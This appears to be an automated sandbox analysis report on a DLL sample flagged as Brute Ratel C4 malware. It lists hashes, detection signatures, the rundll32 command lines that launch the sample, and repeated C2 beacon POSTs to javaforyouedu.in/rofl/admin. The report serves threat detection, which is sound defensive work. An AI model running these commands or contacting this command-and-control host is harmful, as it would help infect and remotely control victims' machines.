Edit tour

Windows Analysis Report
IMS64.dll.dll

Overview

General Information

Sample name:	IMS64.dll.dll (renamed file extension from exe to dll)
Original sample name:	IMS64.dll.exe
Analysis ID:	1500442
MD5:	4a10fb513a346ffdca884fa74cf18015
SHA1:	623b8046938fd54fae54957ece8c7ff40653217b
SHA256:	079e3171048286472cff2b0267cd2d6a90bf9d7f45255f48031bf4bf2ac3b0b4
Tags:	exejavaforyouedu-in
Infos:

Detection

BruteRatel

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Yara detected BruteRatel

AI detected suspicious sample

Modifies the context of a thread in another process (thread injection)

Sets debug register (to hijack the execution of another thread)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to query network adapater information

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found large amount of non-executed APIs

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

loaddll64.exe (PID: 7308 cmdline: loaddll64.exe "C:\Users\user\Desktop\IMS64.dll.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)

conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7360 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\IMS64.dll.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

rundll32.exe (PID: 7396 cmdline: rundll32.exe "C:\Users\user\Desktop\IMS64.dll.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)

rundll32.exe (PID: 7372 cmdline: rundll32.exe C:\Users\user\Desktop\IMS64.dll.dll,main MD5: EF3179D498793BF4234F708D3BE28633)

rundll32.exe (PID: 7500 cmdline: rundll32.exe "C:\Users\user\Desktop\IMS64.dll.dll",main MD5: EF3179D498793BF4234F708D3BE28633)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Brute Ratel C4, BruteRatel	Brute Ratel is a a Customized Command and Control Center for Red Team and Adversary SimulationSMB and TCP payloads provide functionality to write custom external C2 channels over legitimate websites such as Slack, Discord, Microsoft Teams and more.Built-in debugger to detect EDR userland hooks.Ability to keep memory artifacts hidden from EDRs and AV.Direct Windows SYS calls on the fly.	No Attribution	https://0xdarkvortex.dev/hiding-in-plainsight/ https://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/ https://andreafortuna.org/2023/02/23/how-to-detect-brute-ratel-activities https://blog.reveng.ai/latrodectus-distribution-via-brc4/ https://blog.spookysec.net/analyzing-brc4-badgers/	https://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: rundll32.exe PID: 7500	JoeSecurity_BruteRatel_2	Yara detected BruteRatel	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: IMS64.dll.dll	ReversingLabs: Detection: 28%
Source: IMS64.dll.dll	Virustotal: Detection: 26%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.4% probability

Source: unknown	HTTPS traffic detected: 43.206.237.192:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 43.206.237.192:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 43.206.237.192:443 -> 192.168.2.4:49734 version: TLS 1.2

Source: IMS64.dll.dll

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe

Network Connect: 43.206.237.192 443

Jump to behavior

Source: Joe Sandbox View

ASN Name: LILLY-ASUS LILLY-ASUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 538Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 538Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 538Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 96Connection: Keep-AliveCache-Control: no-cache

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: javaforyouedu.in

Source: unknown

HTTP traffic detected: POST /rofl/admin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: javaforyouedu.inContent-Length: 538Connection: Keep-AliveCache-Control: no-cache

Source: rundll32.exe, 00000003.00000002.4122414649.000001CDED202000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2024553634.000001CDED19F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4122414649.000001CDED19F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2337575131.000001CDED19F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2337575131.000001CDED207000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4122385364.000001FB0D930000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3711576277.000001FB0D930000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2640820421.000001FB0D995000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2024250096.000001FB0D935000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2336710000.000001FB0D995000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3122503909.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4122196214.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4122196214.000001E8C6C56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3851106609.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3597962223.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3385284343.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://javaforyouedu.in/
Source: rundll32.exe, 00000003.00000003.2024553634.000001CDED19F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4122414649.000001CDED19F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2337575131.000001CDED19F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://javaforyouedu.in/-
Source: rundll32.exe, 00000004.00000003.1716599072.000001FB0D991000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1717104370.000001FB0D991000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://javaforyouedu.in/H
Source: rundll32.exe, 00000005.00000003.2318339849.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2483934674.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://javaforyouedu.in/O
Source: rundll32.exe, 00000005.00000002.4122196214.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4122196214.000001E8C6C8B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2483934674.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3385284343.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://javaforyouedu.in/rofl/admin
Source: rundll32.exe, 00000005.00000003.2483934674.000001E8C6C8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://javaforyouedu.in/rofl/admin#
Source: rundll32.exe, 00000005.00000003.2318339849.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://javaforyouedu.in/rofl/admin2
Source: rundll32.exe, 00000003.00000003.3145988406.000001CDED22A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://javaforyouedu.in/rofl/admin4
Source: rundll32.exe, 00000003.00000002.4122414649.000001CDED1DA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2337575131.000001CDED1DB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2024553634.000001CDED1DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://javaforyouedu.in/rofl/admin8x
Source: rundll32.exe, 00000005.00000003.3122503909.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3851106609.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2483934674.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://javaforyouedu.in/rofl/admin9
Source: rundll32.exe, 00000004.00000003.3711576277.000001FB0D918000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4122385364.000001FB0D918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://javaforyouedu.in/rofl/admin=
Source: rundll32.exe, 00000004.00000002.4122385364.000001FB0D994000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3597962223.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3385284343.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://javaforyouedu.in/rofl/adminA
Source: rundll32.exe, 00000005.00000003.3597962223.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2483934674.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://javaforyouedu.in/rofl/adminD
Source: rundll32.exe, 00000004.00000003.3711576277.000001FB0D994000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://javaforyouedu.in/rofl/adminL
Source: rundll32.exe, 00000005.00000003.3122503909.000001E8C6CD6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2318339849.000001E8C6CD6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2484020877.000001E8C6CD6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1958211641.000001E8C6CD5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3851202401.000001E8C6CD6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3385381204.000001E8C6CD6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1958118482.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3597962223.000001E8C6CD6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4122196214.000001E8C6CD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://javaforyouedu.in/rofl/adminM
Source: rundll32.exe, 00000005.00000003.3122503909.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3851106609.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3597962223.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3385284343.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://javaforyouedu.in/rofl/adminN
Source: rundll32.exe, 00000004.00000003.3711576277.000001FB0D966000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://javaforyouedu.in/rofl/adminYcM(
Source: rundll32.exe, 00000005.00000003.2483934674.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1958118482.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3122503909.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3597962223.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2318339849.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3385284343.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3851106609.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4122196214.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://javaforyouedu.in/rofl/admini
Source: rundll32.exe, 00000004.00000003.3711576277.000001FB0D918000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4122385364.000001FB0D918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://javaforyouedu.in/rofl/admink
Source: rundll32.exe, 00000004.00000003.3711716551.000001FB0D9B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2640820421.000001FB0D995000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2640866940.000001FB0D9B0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2024200405.000001FB0D995000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2853714968.000001FB0D994000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2336772158.000001FB0D9B0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4122385364.000001FB0D994000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2336710000.000001FB0D995000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2853768398.000001FB0D9B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://javaforyouedu.in/rofl/admino
Source: rundll32.exe, 00000005.00000002.4122196214.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://javaforyouedu.in/rofl/admins
Source: rundll32.exe, 00000003.00000002.4122414649.000001CDED1DA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2337575131.000001CDED1DB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2024553634.000001CDED1DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://javaforyouedu.in/rofl/adminux
Source: rundll32.exe, 00000004.00000003.3711576277.000001FB0D966000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://javaforyouedu.in/rofl/adminxcn(
Source: rundll32.exe, 00000005.00000003.3597962223.000001E8C6C8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://javaforyouedu.in/rofl/adminy
Source: rundll32.exe, 00000004.00000003.1716599072.000001FB0D991000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1717104370.000001FB0D991000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://javaforyouedu.in/rofl/admin~
Source: rundll32.exe, 00000004.00000002.4122385364.000001FB0D930000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3711576277.000001FB0D930000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2024250096.000001FB0D935000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://javaforyouedu.in/wA

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
